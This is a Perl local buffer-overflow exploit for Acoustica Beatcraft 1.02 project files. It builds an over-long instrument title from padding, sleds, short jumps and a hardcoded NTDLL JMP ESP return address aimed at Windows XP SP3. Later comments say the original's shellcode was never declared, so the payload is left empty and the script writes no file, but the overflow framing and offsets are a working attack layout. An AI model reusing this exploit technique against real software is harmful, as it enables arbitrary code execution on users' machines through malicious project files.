#!/usr/bin/perl
#
# Acoustica Beatcraft (bcproj file) Local BOF Exploit
# Author: Koshi
#
# Date: 08-30-08 ( 0day )
# Application: Acoustica Beatcraft
# Version(s): v1.02 Build 19
# Site: http://acoustica.com/beatcraft/index.htm
# Tested On: Windows XP SP3 Fully Patched
#
# Acoustica Beatcraft contains a buffer prone to exploitation via an
# overly long string. The buffer contains the "title" of the "instruments"
# one can insert into a Beatcraft project. This exploit is a bit
# unstable, in that to exploit it properly one must first open
# Beatcraft and then open the exploit file from within Beatcraft.
# Simply double-clicking the file will result in a simple DoS
# scenario. ( Hopefully I'll fix this soon )
# My guess as of now is we're not going to have it both ways.
#
# gr33tz: Rima my baby, str0ke, breaker_unit, mess'
#
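use strict;
use warnings;

# Layout of the over-long instrument "title" string written into the
# .bcproj file (see header).  Every length below is taken from the
# original listing; the bytes placed before $shellcode total
# 179 + 110 + 2 + 4 + 2 + 34 = 331.  For a defender, a title field of
# roughly this size or larger in a .bcproj is the condition a parser
# should reject, and the thing a file scanner can key on.
my $led1 = "A" x 110;   # Sled ( \x41 INC ECX )
my $led2 = "A" x 34;    # Sled ( \x41 INC ECX )
my $buf1 = "A" x 179;   # Overflow

# The original listing interpolated $shellcode without ever declaring
# it, so it carried no payload and did not compile under strict.  It is
# kept as an explicit empty placeholder: this file builds the framing
# only and never writes $buff anywhere.
my $shellcode = '';

# The comment on the JMP ESP line was line-wrapped in the original,
# leaving "different JMP ESP )" outside the comment and breaking the
# parse; re-joined here.
my $buff = join '',
    $buf1,                # Overflowage...
    $led1,                # Slide on down to the jump
    "\xeb\x07",           # Jump NTDLL address
    "\xed\x1e\x94\x7c",   # NTDLL.DLL JMP ESP ( This may need to be
                          # changed to a different JMP ESP )
    "\xeb\x31",           # Line it up right and land into the sled
    $led2,                # Slip on down to the shellcode
    $shellcode;           # ..to the beat of a different drum.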